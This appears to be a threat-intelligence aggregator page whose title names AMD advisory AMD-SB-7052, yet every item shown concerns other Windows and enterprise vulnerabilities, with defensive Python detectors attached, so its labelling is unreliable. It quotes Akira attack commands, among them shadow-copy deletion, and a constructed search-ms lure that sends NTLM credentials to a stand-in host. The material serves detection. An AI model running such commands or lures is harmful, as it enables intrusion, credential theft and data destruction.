ctipilot.ch

AMD-SB-7052 — Zen 2 µop-cache corruption / SoC isolation LPE (May 2026 Windows CU / Xen XSA-490)

vulnerability-trend · advisory:amd-sb-7052

Coverage timeline: 2 (first 2026-05-16 → last 2026-05-16)
Briefs: 1 (1 distinct)
Sources cited: 47 (28 hosts)
Sections touched: 2 (action_items, trending_vulns)
Co-occurring entities: 8

Story timeline

  1. 2026-05-16 · CTI Daily Brief — 2026-05-16 · trending_vulns
     First coverage. AMD discloses µop-cache corruption on Zen 2 SoCs allowing local privilege escalation and potential hypervisor-isolation degradation; CWE-1189; microcode mitigation in May 2026 Microsoft cumulative update + Fedora kernel/microcode + Xen XSA-490 + Lenovo LEN-216977.
  2. 2026-05-16 · CTI Daily Brief — 2026-05-16 · action_items
     First coverage, same summary as entry 1 (the item is listed in both the trending_vulns and action_items sections of that brief).

Where this entity is cited

  • trending_vulns: 1
  • action_items: 1

Source distribution

  • msrc.microsoft.com: 7 (15%)
  • bleepingcomputer.com: 6 (13%)
  • thehackernews.com: 5 (11%)
  • advisories.ncsc.nl: 3 (6%)
  • helpnetsecurity.com: 2 (4%)
  • theregister.com: 2 (4%)
  • akamai.com: 1 (2%)
  • amd.com: 1 (2%)
  • other: 20 (43%)


Items in briefs about AMD-SB-7052 — Zen 2 µop-cache corruption / SoC isolation LPE (May 2026 Windows CU / Xen XSA-490) (27)

Cisco Talos: a field guide to Windows COM abuse — ITaskService, BITS, WMI and DCOM as EDR-evasion primitives [SINGLE-SOURCE]

From CTI Daily Brief — 2026-06-28 · published 2026-06-28

Cisco Talos published a reverse-engineering primer (2026-06-25) on how Windows threats weaponise Component Object Model (COM) interfaces to hide operations inside legitimate service call stacks (Cisco Talos, 2026-06-25). Four technique classes share one detection gap: calls routed through vtable indirection rather than direct API imports limit EDR visibility. ITaskService/ITaskScheduler persistence creates scheduled tasks with no visible schtasks.exe process (T1053.005); IBackgroundCopyJob (BITS) moves C2 traffic and files under the trusted BITS service process (T1197); IWbemLocator/WMI blends discovery into svchost.exe (T1082, T1518.001); and DCOM/IDispatch enables remote object activation for lateral movement (T1021.003). Families studied include Gh0stRAT (ITaskService persistence), Attor (BITS C2 + WMI), Qakbot (WMI) and WarmCookie (ITaskScheduler 1.0). The actionable takeaway for detection engineers: scheduled-task-creation rules keyed on schtasks.exe/PowerShell process creation miss COM-based task creation, which leaves only the task-registration events themselves; build coverage for task creation where the creating image is unexpected, WMI activity from non-system parents, and BITS jobs created by non-svchost processes.
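One way to express the "task created with no expected creating image" coverage the Talos item asks for, as an added example (not Talos code): correlate each Security 4698 task-registration event with the 4688 process-creation events from the same host and logon session in the preceding seconds, and surface registrations that were not preceded by schtasks.exe, mmc.exe or PowerShell. The record layout, the 30-second lookback and the sample events are assumptions constructed for the example; map them to your SIEM's field names.

```python
"""Absence-correlation for COM-registered scheduled tasks.

A Security 4698 (task created) with no schtasks.exe / mmc.exe / PowerShell
process creation (4688) in the same logon session shortly before it is
surfaced as a candidate COM (ITaskService) registration for review.
Added example, not Talos code; field layout and sample events are constructed.
"""
from datetime import datetime, timedelta

# Images that normally precede a task registration in an interactive session.
EXPECTED_CREATORS = {"schtasks.exe", "mmc.exe", "powershell.exe", "pwsh.exe"}


def com_registered_tasks(events, lookback=timedelta(seconds=30)):
    """Return the 4698 events that have no expected creator in the same logon
    session within `lookback` before the registration.

    events: dicts with 'ts' (datetime), 'host', 'EventID' and either
      4688: 'NewProcessName', 'SubjectLogonId'
      4698: 'TaskName', 'SubjectLogonId'
    """
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)

    findings = []
    for evs in by_host.values():
        recent = []  # (ts, logon_id, image basename) of recent process creations
        for ev in evs:
            if ev["EventID"] == 4688:
                image = ev["NewProcessName"].rsplit("\\", 1)[-1].lower()
                recent.append((ev["ts"], ev["SubjectLogonId"], image))
            elif ev["EventID"] == 4698:
                cutoff = ev["ts"] - lookback
                recent = [r for r in recent if r[0] >= cutoff]  # drop stale entries
                if not any(lid == ev["SubjectLogonId"] and img in EXPECTED_CREATORS
                           for _, lid, img in recent):
                    findings.append(ev)
    return findings


# Constructed sample telemetry (hostnames, paths and logon IDs are made up).
SAMPLE_EVENTS = [
    # Benign: schtasks.exe ran in logon 0x3e7 two seconds before the registration.
    {"ts": datetime(2026, 6, 25, 9, 0, 0), "host": "ws01", "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\schtasks.exe", "SubjectLogonId": "0x3e7"},
    {"ts": datetime(2026, 6, 25, 9, 0, 2), "host": "ws01", "EventID": 4698,
     "TaskName": r"\Microsoft\Windows\Maintenance\Nightly", "SubjectLogonId": "0x3e7"},
    # Suspect: only updater.exe started in logon 0x5a1 before the task appeared.
    {"ts": datetime(2026, 6, 25, 9, 5, 0), "host": "ws01", "EventID": 4688,
     "NewProcessName": r"C:\Users\alice\AppData\Roaming\updater.exe", "SubjectLogonId": "0x5a1"},
    {"ts": datetime(2026, 6, 25, 9, 5, 3), "host": "ws01", "EventID": 4698,
     "TaskName": r"\OneDriveUpdate", "SubjectLogonId": "0x5a1"},
    # Suspect: a registration on another host with no process creation at all.
    {"ts": datetime(2026, 6, 25, 9, 20, 0), "host": "ws02", "EventID": 4698,
     "TaskName": r"\Updater", "SubjectLogonId": "0x7c2"},
]

if __name__ == "__main__":
    for f in com_registered_tasks(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['TaskName']} registered by logon {f['SubjectLogonId']} "
              f"with no expected creating image")
```

The rule is a heuristic: an operator who launches schtasks.exe and a COM-based implant in the same session within the window will be missed, so tune the lookback to your 4688 volume and pair it with the image-load and WMI/BITS coverage the Talos item lists.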

Threat actor: FishMonger (I-SOON) ports SprySOCKS to Windows with a kernel-mode rootkit

From CTI Weekly Summary — 2026-W25 (Jun 15 – Jun 21, 2026) · published 2026-06-22

ESET's full research paper detailed two previously undocumented Windows variants of the SprySOCKS backdoor attributed to FishMonger (Earth Lusca / Aquatic Panda — the Winnti-contractor tracked as I-SOON), centred on a RawWNPF.sys kernel driver that hides processes (NtQuerySystemInformation hook), network connections (nsiproxy.sys IOCTL interception), files (minifilter callbacks) and persistence registry keys, and redirects crafted TCP packets to a hidden backdoor port via the Windows Filtering Platform (ESET, 2026-06-16; daily 06-17). Background: FishMonger has been publicly tracked since the 2024 I-SOON contractor-leak exposed its government-espionage-for-hire model; ESET's earlier work documented the Linux SprySOCKS lineage, and this report extends the toolkit to a Windows kernel rootkit with a possible UEFI-bootkit component (leveraging the patched BlackLotus Secure Boot bypass, CVE-2023-24932). Confirmed victims are government organisations in Honduras, Taiwan, Thailand and Pakistan; the targeting class — government and defence — keeps EU government networks in scope. Enable the vulnerable-driver blocklist, hunt for the named driver and for process/network-hiding behaviours, and verify Secure Boot is at current patch level.

FishMonger (I-SOON) ports its SprySOCKS backdoor to Windows with a kernel-driver rootkit

From CTI Daily Brief — 2026-06-17 · published 2026-06-17

ESET disclosed two previously undocumented Windows variants of SprySOCKS — a backdoor it attributes to FishMonger (a.k.a. Earth Lusca / Aquatic Panda / TAG-22), assessed with high confidence as operated by Chinese contractor I-SOON (ESET WeLiveSecurity, 2026-06-16). Previously known only as a Linux backdoor, the Windows builds (WIN_PLUS and WIN_DRV) were deployed in 2023–2024 against foreign-affairs, technology and telecom government bodies in Taiwan, Thailand, Pakistan and Honduras. WIN_PLUS persists as a Windows Print Processor (VSPMsg) and supports 30+ commands over TCP/UDP/WebSocket. WIN_DRV is the notable one: it loads a kernel driver (fsdiskbit.sys, signed with a certificate from the public PastDSE leaked-cert corpus) which memory-loads a second driver to deliver rootkit-class stealth — hiding processes, files, network connections and registry keys, and performing TCP traffic diversion so the backdoor receives operator commands on an arbitrary port that never appears in netstat (BleepingComputer, 2026-06-16). ESET notes limited, unconfirmed telemetry of a possible UEFI bootkit component (potentially CVE-2023-24932-class Secure Boot bypass).

Why it matters to us: Post-deployment detection is hard because the driver actively hides artefacts; the leverage is pre-deployment hygiene. Hunt scheduled-task creation (EID 4698 / Sysmon EID 1) referencing binaries under %SystemRoot%\Fonts\, Image File Execution Options hijacks of vds.exe, and kernel-driver loads (Sysmon EID 6) of drivers signed with PastDSE-derived certificates. Because TCP diversion defeats host network-tab inspection, rely on EDR kernel sensors / ETW for listening-socket enumeration. Validate that vulnerable/revoked drivers are blocked via WDAC/HVCI and the Microsoft vulnerable-driver blocklist.

CVE-2026-41089 — Windows Netlogon: pre-auth SYSTEM RCE on domain controllers, confirmed exploited in the EU

From CTI Weekly Summary — 2026-W24 (Jun 08 – Jun 14, 2026) · published 2026-06-14

If you did nothing this week: every unpatched domain controller in your forest is a pre-auth remote-code-execution target as SYSTEM, and the exploitation is no longer hypothetical — CERT-EU confirmed in-the-wild abuse in its jurisdiction this week.

CVE-2026-41089 is a CVSS 9.8 stack-based buffer overflow (CWE-121) in the Windows Netlogon RPC service. It was disclosed and patched in the May 2026 Patch Tuesday cycle and tracked in the W23 weekly as a disclosure-and-patch story. This week CERT-EU published advisory 2026-007 (10 June) confirming active exploitation against unpatched DCs in the EU (CERT-EU 2026-007; daily 06-11). A domain controller compromise is full-domain compromise: the entire identity plane is in scope.

Patch every domain controller now — DCs are the one asset class where "patch window" is not a negotiation. Where patching lags, restrict Netlogon RPC exposure at the network layer and hunt for anomalous pre-authentication RPC traffic to DCs and for new SYSTEM-context processes on those hosts.

Chaotic Eclipse / Nightmare Eclipse Windows zero-day wave — three long-tracked bugs patched, a fourth still open

From CTI Weekly Summary — 2026-W24 (Jun 08 – Jun 14, 2026) · published 2026-06-14

This researcher's serialised zero-day disclosures have run across four weekly cycles, and this week brought both resolution and a fresh open wound. June Patch Tuesday (9 June) finally closed the three bugs the W20–W22 weeklies tracked as "expected fix in June": YellowKey (CVE-2026-45585, BitLocker bypass via the Windows Recovery Environment, physical access required), GreenPlasma (CVE-2026-45586, CTFMON elevation to SYSTEM), and MiniPlasma (a re-opened regression of CVE-2020-17103 in the Cloud Filter driver cldflt.sys), per the patch-day round-ups (BleepingComputer; Tenable).

But the cadence continued the same day. On 9 June the researcher published RoguePlanet, a TOCTOU race in the Microsoft Defender scan engine yielding a SYSTEM shell — hours after the patches landed, with no CVE and no fix (BleepingComputer; daily 06-11). Two days later came GreatXML, a BitLocker bypass via crafted XML on the recovery partition — PoC public, practical severity contested, still unpatched (SecurityWeek; daily 06-12). The trajectory: deploy the June cumulative update to close the three patched bugs, retain BitLocker PIN/TPM policy regardless, and keep monitoring MSRC — the fourth disclosure is the pattern, not the exception.

June 2026 Patch Tuesday: four CVSS ≥ 9.1 criticals — Windows kernel TCP/IP RCE, Nuance PowerScribe, Azure Stack Edge, Exchange Online

From CTI Daily Brief — 2026-06-12 · published 2026-06-12

Microsoft's June cumulative update (9 June) carries four criticals that clear the CVSS 9+ bar. CVE-2026-45657 (CVSS 9.8) is the priority: a use-after-free with a heap-overflow component in the Windows kernel's TCP/IP processing path, reachable by "specially crafted network traffic" with no authentication and no user interaction, yielding SYSTEM-level code execution (Microsoft MSRC, 2026-06-09). Microsoft rates exploitation "Less Likely" and reports no in-the-wild activity, but the unauthenticated network-reachable kernel surface makes this the June cycle's patch-first item for any Windows host exposed to untrusted networks. CVE-2026-26142 (CVSS 9.8) is an unauthenticated deserialization-of-untrusted-data RCE (CWE-502) in Nuance PowerScribe, the radiology reporting platform common in hospital imaging departments — clinical networks integrating PowerScribe with PACS/RIS should patch and restrict the service to clinical subnets (Microsoft MSRC, 2026-06-09). CVE-2026-47643 (CVSS 9.8) lets an unauthenticated attacker control the file name/path in an Azure Stack Edge upload endpoint (CWE-73), writing outside the intended directory through to code execution on the hybrid-cloud appliance (Microsoft MSRC, 2026-06-09). CVE-2026-48579 (CVSS 9.1), an improper-authorisation information-disclosure flaw in Exchange Online, is already fixed service-side with no customer action required — tenants wanting assurance can review the Unified Audit Log for anomalous mailbox-access operations predating 4 June (Microsoft MSRC, 2026-06-04). NCSC-NL groups these in its June Patch Tuesday advisories (NCSC-NL, 2026-06-11, NCSC-NL 0189).

UPDATE: Windows Netlogon RCE CVE-2026-41089 now confirmed exploited in the wild in the EU; CERT-EU issues advisory 2026-007

From CTI Daily Brief — 2026-06-11 · published 2026-06-11

UPDATE (originally covered 2026-W23 weekly): CERT-EU published advisory 2026-007 on 10 June 2026 confirming that CVE-2026-41089 — a CVSS 9.8 stack-based buffer overflow (CWE-121) in the Windows Netlogon service — is being actively exploited in the wild, citing Belgium's Centre for Cybersecurity (CCB) (CERT-EU, 2026-06-10). This is the material delta since the weekly's disclosure-only coverage: an EU national authority has now attributed in-the-wild exploitation, roughly 20 days after the May 2026 Patch Tuesday fix.

An unauthenticated remote attacker sends a crafted Netlogon RPC packet to obtain SYSTEM-level code execution on an unpatched domain controller — functionally a full Active Directory forest compromise, in the ZeroLogon lineage of Netlogon-channel attacks (BleepingComputer, 2026-06-01). CERT-EU's advisory carries the per-version patched-build table: Server 2016 before 10.0.14393.9140, Server 2019 before 10.0.17763.8755, Server 2022 before 10.0.20348.5074, Server 2022 23H2 before 10.0.25398.2330, and Server 2025 before 10.0.26100.32772, with Server 2012/2012 R2 also affected.
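The per-version build table above is the only thing a defender needs to triage a DC fleet, so here it is turned into a check, as an added example (not CERT-EU or Microsoft code). The thresholds are the builds quoted in the advisory text; the input is the string `ver` prints (or `CurrentBuildNumber` and `UBR` from `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion` joined as `10.0.<build>.<UBR>`), and the sample inventory is constructed.

```python
"""Patched-build check for CVE-2026-41089 against the CERT-EU 2026-007 table.

Added example (not CERT-EU or Microsoft code). The thresholds are the
per-version builds quoted in the brief; everything else is assumed.
"""
import re

# Minimum patched UBR (fourth field of 10.0.<build>.<UBR>) per Windows Server
# branch, as quoted from CERT-EU 2026-007 in the brief above.
PATCHED_UBR = {
    14393: 9140,   # Windows Server 2016
    17763: 8755,   # Windows Server 2019
    20348: 5074,   # Windows Server 2022
    25398: 2330,   # Windows Server 2022 23H2
    26100: 32772,  # Windows Server 2025
}
# Listed as affected in the advisory, but no patched build is given for them.
NO_THRESHOLD = {9200: "Windows Server 2012", 9600: "Windows Server 2012 R2"}

_BUILD_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d{4,5})(?:\.(\d+))?\b")


def extract_build(text):
    """First 'major.minor.build[.ubr]' in free text, e.g. the output of `ver`
    ("Microsoft Windows [Version 10.0.25398.2330]"); None if absent."""
    m = _BUILD_RE.search(text)
    return m.group(0) if m else None


def parse_build(build_string):
    """'10.0.17763.8755' -> (10, 0, 17763, 8755); the UBR may be absent (None)."""
    m = _BUILD_RE.fullmatch(build_string.strip())
    if not m:
        raise ValueError(f"unrecognised build string: {build_string!r}")
    major, minor, build, ubr = m.groups()
    return int(major), int(minor), int(build), (None if ubr is None else int(ubr))


def netlogon_status(build_string):
    """Classify a DC build against the advisory table.

    'patched' / 'vulnerable' for branches in the table;
    'affected-no-threshold' for 2012 / 2012 R2 (affected, no build quoted);
    'unknown-build' for a branch not in the table (e.g. a client SKU);
    'ubr-missing' when the fourth field is absent, so the CU level is unknown.
    """
    _, _, build, ubr = parse_build(build_string)
    if build in NO_THRESHOLD:
        return "affected-no-threshold"
    if build not in PATCHED_UBR:
        return "unknown-build"
    if ubr is None:
        return "ubr-missing"
    return "patched" if ubr >= PATCHED_UBR[build] else "vulnerable"


def triage(ver_outputs):
    """{hostname: `ver` output} -> {hostname: status}; 'unparsed' if no build found."""
    result = {}
    for host, text in ver_outputs.items():
        b = extract_build(text)
        result[host] = netlogon_status(b) if b else "unparsed"
    return result


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {
        "dc01": "Microsoft Windows [Version 10.0.17763.8755]",
        "dc02": "Microsoft Windows [Version 10.0.20348.5000]",
        "dc03": "Microsoft Windows [Version 6.3.9600.22000]",
    }
    for host, status in triage(sample).items():
        print(f"{host}: {status}")
```

Treat 'affected-no-threshold' and 'ubr-missing' as vulnerable until proven otherwise: the first is an out-of-table Server 2012 branch, the second means the cumulative-update level was not captured.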

CVE-2026-41089 — Windows Netlogon: pre-auth SYSTEM RCE on domain controllers, actively exploited

From CTI Weekly Summary — 2026-W23 (1–7 June 2026) · published 2026-06-08

If you did nothing this week: pre-auth remote-code execution as SYSTEM on every unpatched domain controller in your forest. Belgium's CCB confirmed active exploitation on 1 June. The May Patch Tuesday fix has been available since 13 May.

CVE-2026-41089 (CVSS 9.8) is a stack-based buffer overflow in the Windows Netlogon service (MS-NRPC), first covered as an emergency action on 2 June (daily 2026-06-02). A crafted NRPC request to a domain controller triggers a memory-corruption condition before any credential exchange, allowing an unauthenticated network attacker to execute code as SYSTEM (Microsoft MSRC; BleepingComputer, 2026-06-01). All currently supported Windows Server releases including Server 2025 are affected. Belgium's Centre for Cybersecurity (CCB) confirmed active exploitation; at the time of the daily brief Microsoft had not yet updated its advisory to reflect it.

The operational priority here is the target class — domain controllers — and the fact that Netlogon is necessarily reachable from every domain-joined machine in the estate. An attacker who has compromised any domain-joined workstation can move laterally to a DC without credentials if the patch has not been applied. Detection concepts: anomalous NRPC session counts from non-DC source addresses; Windows Security EID 4625 (authentication failures) spikes on DCs correlated with unexpected source IPs; network-layer alerts on NRPC/RPC-over-named-pipe from workstation segments. Patch immediately. If patching is delayed, restrict Netlogon/LDAP exposure to trusted hosts at the network layer.

Huntress: Windows `search:` URI handler leaks NTLMv2 hashes — Microsoft declines to patch

From CTI Daily Brief — 2026-06-04 · published 2026-06-04

Huntress detailed an unpatched NTLMv2-leak in the Windows search: protocol handler: a crafted link with a crumb=location: parameter pointing at an attacker UNC path makes Windows open an outbound SMB (TCP 445) connection and expose the user's Net-NTLMv2 challenge-response for offline cracking or relay (Huntress, 2026-06-03 · The Hacker News, 2026-06-03). The bug class is structurally identical to the Snipping Tool ms-screensketch: handler leak (CVE-2026-33829) patched in April; Huntress reported the search: variant a day later but Microsoft declined a CVE or fix, assessing it as Moderate severity — below the Important/Critical threshold of its servicing bar. Forced-authentication mapping is T1187. The single highest-value control neutralises the whole URI-handler leak class: block outbound SMB (TCP 445/139) at host firewall and perimeter for endpoints that don't need external shares, and enable EPA on NTLM-accepting services.
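A mail-gateway or proxy rule can catch the lure before the click. As an added example (not Huntress code), the parser below splits a search:/search-ms: URI into its parameters and flags a crumb=location: value that points off-host (a UNC path or an http(s) WebDAV URL). The URI layout assumed here (scheme, then &-separated, percent-encoded key=value pairs) follows the Huntress description; the sample URIs are constructed.

```python
"""Parse search:/search-ms: URIs and flag crumb=location: values that would
make Explorer reach a remote path (forced authentication, T1187).
Added example, not Huntress code; URI layout assumed from the description.
"""
import re
from urllib.parse import unquote

SCHEMES = ("search-ms:", "search:")
_UNC = re.compile(r"^(\\\\|//)[^\\/]+")   # \\host\share or //host/share
_URL = re.compile(r"^https?://", re.I)     # WebDAV-style location


def parse_search_uri(uri):
    """(scheme, [(key, value), ...]) with keys lower-cased and both sides
    percent-decoded; (None, []) when the scheme is not a search handler."""
    s = uri.strip()
    scheme = next((x for x in SCHEMES if s.lower().startswith(x)), None)
    if scheme is None:
        return None, []
    params = []
    for part in s[len(scheme):].split("&"):
        if part:
            k, _, v = part.partition("=")
            params.append((unquote(k).strip().lower(), unquote(v)))
    return scheme, params


def remote_crumb_locations(uri):
    """crumb=location: targets that are remote (UNC or http(s))."""
    _, params = parse_search_uri(uri)
    hits = []
    for k, v in params:
        if k != "crumb":
            continue
        kind, _, target = v.partition(":")   # split only at the first colon
        target = target.strip()
        if kind.strip().lower() == "location" and (_UNC.match(target) or _URL.match(target)):
            hits.append(target)
    return hits


def is_forced_auth_lure(uri):
    return bool(remote_crumb_locations(uri))


if __name__ == "__main__":
    # Constructed lure: a percent-encoded UNC path to an attacker host.
    lure = "search-ms:query=invoice&crumb=location:%5C%5C203.0.113.9%5Cshare&displayname=Documents"
    print(remote_crumb_locations(lure))   # ['\\\\203.0.113.9\\share']
```

Blocking the link is a second layer only; the control that neutralises the whole class is the outbound TCP 445/139 block the item recommends, since a blocked lure variant (a different handler, a different parameter) will follow.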

UPDATE: Windows Netlogon CVE-2026-41089 moves from "patch-available" to actively exploited

From CTI Daily Brief — 2026-06-02 · published 2026-06-02

UPDATE (originally covered 2026-05-13): The Windows Netlogon stack-based buffer-overflow RCE patched in May 2026 Patch Tuesday is now reported as exploited in the wild. Belgium's Centre for Cybersecurity (CCB) confirmed active exploitation on 1 June, and BleepingComputer, Help Net Security and SecurityWeek reported the same (BleepingComputer, 2026-06-01 · Help Net Security, 2026-06-01).

The vulnerability is an unauthenticated, network-reachable overflow in the Netlogon service that yields SYSTEM on a domain controller, affecting all currently supported Windows Server releases including Server 2025 (Microsoft MSRC). Microsoft had not updated its advisory to mark the CVE exploited as of 1 June, so the exploitation signal currently rests on CCB plus the reporting outlets rather than the vendor. The operational shift is decisive: a flaw previously reasonable to schedule into a patch cycle is now an emergency change for every internet- or network-reachable DC. See §0 for the immediate action.

CVE-2026-32996 & CVE-2026-32997 — Veeam Backup & Replication KB4852: LPE in Windows Agent, arbitrary file write in Linux appliance

From CTI Daily Brief — 2026-05-29 · published 2026-05-29

Veeam shipped KB4852 / Backup & Replication patch version 13.0.2.29 on 2026-05-27. CVE-2026-32996 (CVSS 7.3) is a local privilege escalation in the Veeam Agent for Microsoft Windows component — an attacker with limited system access can elevate to enable arbitrary command execution, security-control disablement or lateral movement; reporter Alibaba via HackerOne. CVE-2026-32997 (CVSS 8.6) is an arbitrary file write in the Veeam Software Appliance (Linux) constrained to authenticated users with the Backup Administrator role; depending on the target path (cron, authorized_keys, library hijack), this is a stepping stone to RCE or persistence. Both affect all version-13 builds before fixed version 13.0.2.29. CERT-FR / ANSSI advisory CERTFR-2026-AVI-0652 corroborates. No exploitation reported; Veeam notes patch-reverse-engineering risk after disclosure. Veeam is the dominant backup platform in EU public-sector on-premise environments — patch the appliance and Windows agent fleet in tandem with backup-administrator least-privilege review.

CVE Summary Table

CVE | Product | CVSS | EPSS | KEV | Exploited | Fixed in | Source
CVE-2026-35616 | Fortinet FortiClient EMS 7.4.5–7.4.6 | 9.1 | 43.2% | Yes (2026-04-06) | Yes — EKZ Infostealer | EMS 7.4.7 | Fortinet PSIRT
CVE-2026-4408 | Samba (SAMR RPC) | 10.0 | n/a | No | No | 4.22.10 / 4.23.8 / 4.24.3 | Samba Project
CVE-2026-4480 | Samba (print command) | 10.0 | n/a | No | No | 4.22.10 / 4.23.8 / 4.24.3 | Samba Project
CVE-2026-9170 | IBM HTTP Server / WebSphere | 9.8 | 0.049% | No | No | APAR PH71265 | IBM Security Bulletin
CVE-2026-44939 | SUSE Rancher (cluster import) | 9.6 | n/a | No | No | 2.10.12 / 2.11.14 / 2.12.10 / 2.13.6 / 2.14.2 | SUSE GHSA
CVE-2026-44848 | Portainer CE (Docker plugin endpoints) | 9.4 | n/a | No | No | 2.33.8 / 2.39.2 / 2.41.0 | Portainer GHSA
CVE-2026-44849 | Portainer CE (Swarm service bypass) | 9.4 | n/a | No | No | 2.33.8 / 2.39.2 / 2.41.0 | CCB Belgium
CVE-2026-41053 | SUSE Rancher (GitHub App auth) | 8.8 | n/a | No | No | 2.13.6 / 2.14.2 | SUSE GHSA
CVE-2026-32997 | Veeam Backup Linux appliance | 8.6 | n/a | No | No | 13.0.2.29 | Veeam KB4852
CVE-2026-41052 | SUSE Rancher (PSA priv-esc) | 8.4 | n/a | No | No | 2.12.10 / 2.13.6 / 2.14.2 | SUSE GHSA
CVE-2026-4868 | GitLab CE/EE (Duo AI) | 8.2 | n/a | No | No | 19.0.1 / 18.11.4 / 18.10.7 | GitLab
CVE-2026-32996 | Veeam Windows Agent | 7.3 | n/a | No | No | 13.0.2.29 | Veeam KB4852
CVE-2026-6713 | GitLab CE/EE (project enumeration) | 5.3 | n/a | No | No | 19.0.1 / 18.11.4 / 18.10.7 | GitLab

SANS ISC — Akira ransomware kill chain reconstructed entirely from SSLVPN syslog and Windows EVTX, no EDR [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-28 · published 2026-05-28

SANS ISC handler Manuel Humberto Santander Pelaez published a forensic walkthrough on 2026-05-27 reconstructing an Akira ransomware intrusion using only two log sources — SSLVPN syslog and Windows EVTX exports — joined by source IP and normalised time (SANS Internet Storm Center, 2026-05-27). [SINGLE-SOURCE] — high-reliability technical primary, but no independent corroboration of the specific kill chain. Initial access (T1078.001 / T1133): non-distributed brute force from a single hosting-provider IP against a single local SSLVPN account that had been deprovisioned in Active Directory but remained provisioned as a local firewall user with no MFA. Discovery: EID 4688 captures nltest.exe /dclist:, net.exe group "Domain Admins" /domain, net.exe group "Enterprise Admins" /domain, whoami.exe /all, and a renamed AdFind.exe variant, all parented explorer.exe → cmd.exe. Credential access (T1558.003 Kerberoasting): a cluster of EID 4769 RC4-encrypted TGS requests for multiple SPNs from a single workstation within a 90-second window. Lateral movement (T1021.001): EID 4624 Logon Type 10 chain from jump host to file server, domain controllers, backup server; EID 4672 special-logon privileges on DC. Defense evasion + impact: EID 1102 security-log clear; sc.exe / net stop of endpoint-protection services (System EID 7036); vssadmin delete shadows /all /quiet.

Why it matters to us: the diary is a forensic-primer for any SOC operating without full EDR coverage — the standard scenario in smaller public-sector entities and DACH commune networks. Concrete takeaways the SANS ISC author makes directly: reconcile local SSLVPN account directories against AD source-of-truth (deprovisioned-in-AD-but-retained-in-firewall is the recurring initial-access pathway in this class); alert on > 50 failed SSLVPN auths from a single source per hour; enable EID 4688 process auditing on every Windows host, set Security log size ≥ 1 GB; alert on RC4 TGS-REP (EID 4769 EncryptionType=0x17) for multiple SPNs from one workstation in a short window; EID 1102 security-log clear is incident-grade in every case; time-sync every host including the firewall to the same NTP source so perimeter-to-endpoint joins remain reliable.
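Two of the diary's thresholds (more than 50 failed SSLVPN logins from one source per hour; RC4 TGS requests for several SPNs from one workstation inside 90 seconds) are the same sliding-window problem, so one aggregator serves both. This is an added example, not the diary author's code: the SSLVPN syslog line layout and the EID 4769 field names (IpAddress, ServiceName, TicketEncryptionType) are assumptions to map onto your firewall's format and your SIEM's parsing, and the log records are constructed.

```python
"""Two detections from the SANS ISC Akira diary, run over constructed logs.

Added example (not the diary author's code). The SSLVPN syslog layout and the
EID 4769 field names are assumptions; the sample records are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta


def windowed_clusters(events, key, window, threshold, distinct=None):
    """Sliding-window aggregation shared by both rules.

    events: dicts with a datetime under 'ts' (sorted here by 'ts').
    key: event -> grouping key (source IP). window: timedelta width.
    threshold: fires when the count in the window (or, if `distinct` is given,
    the number of distinct `distinct(event)` values) reaches it.
    Returns {key: (window_start, window_end)} for the first firing per key.
    """
    buckets = defaultdict(deque)
    fired = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        k = key(ev)
        dq = buckets[k]
        dq.append(ev)
        while ev["ts"] - dq[0]["ts"] > window:   # evict events older than the window
            dq.popleft()
        if k in fired:
            continue
        size = len({distinct(e) for e in dq}) if distinct else len(dq)
        if size >= threshold:
            fired[k] = (dq[0]["ts"], ev["ts"])
    return fired


# Rule 1: more than 50 failed SSLVPN authentications from one source IP in an hour.
_VPN_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) sslvpn: login failed "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$")


def detect_vpn_bruteforce(lines, threshold=51, window=timedelta(hours=1)):
    events = []
    for line in lines:
        m = _VPN_FAIL.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]),
                           "src": m["src"], "user": m["user"]})
    return windowed_clusters(events, key=lambda e: e["src"],
                             window=window, threshold=threshold)


# Rule 2: RC4 (0x17) TGS requests for several distinct SPNs from one host in 90 s.
def detect_kerberoast(events_4769, min_spns=4, window=timedelta(seconds=90)):
    rc4 = [dict(e, IpAddress=e["IpAddress"].removeprefix("::ffff:"))   # 4769 logs IPv4-mapped
           for e in events_4769 if e["TicketEncryptionType"].lower() == "0x17"]
    return windowed_clusters(rc4, key=lambda e: e["IpAddress"], window=window,
                             threshold=min_spns, distinct=lambda e: e["ServiceName"])


# Constructed sample data (not real telemetry).
def sample_vpn_lines():
    base = datetime(2026, 5, 10, 2, 0, 0)
    burst = [f"{(base + timedelta(seconds=30 * i)).isoformat()} sslvpn: login failed "
             f"user=svc-legacy src=203.0.113.7" for i in range(60)]   # 60 failures in 30 min
    noise = [f"{(base + timedelta(minutes=15 * i)).isoformat()} sslvpn: login failed "
             f"user=jdoe src=198.51.100.4" for i in range(5)]         # 5 failures in 75 min
    return burst + noise


def sample_4769_events():
    base = datetime(2026, 5, 10, 3, 0, 0)
    spns = ["MSSQLSvc/db01.corp.example:1433", "HTTP/web01.corp.example",
            "MSSQLSvc/db02.corp.example:1433", "exchangeMDB/mail01.corp.example",
            "CIFS/fs01.corp.example"]
    roast = [{"ts": base + timedelta(seconds=10 * i), "IpAddress": "::ffff:10.0.0.25",
              "ServiceName": s, "TicketEncryptionType": "0x17"} for i, s in enumerate(spns)]
    normal = [{"ts": base + timedelta(seconds=15 * i), "IpAddress": "::ffff:10.0.0.40",
               "ServiceName": s, "TicketEncryptionType": "0x12"} for i, s in enumerate(spns)]
    lone = [{"ts": base + timedelta(minutes=5), "IpAddress": "::ffff:10.0.0.77",
             "ServiceName": spns[0], "TicketEncryptionType": "0x17"}]
    return roast + normal + lone


if __name__ == "__main__":
    print("SSLVPN brute force:", detect_vpn_bruteforce(sample_vpn_lines()))
    print("Kerberoast bursts:", detect_kerberoast(sample_4769_events()))
```

The single RC4 request from a legacy host does not fire, which is the point of thresholding on distinct SPNs rather than on RC4 alone; the diary's remaining advice (time-sync the firewall and the hosts to one NTP source) is what makes the 'ts' join between the two sources trustworthy.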

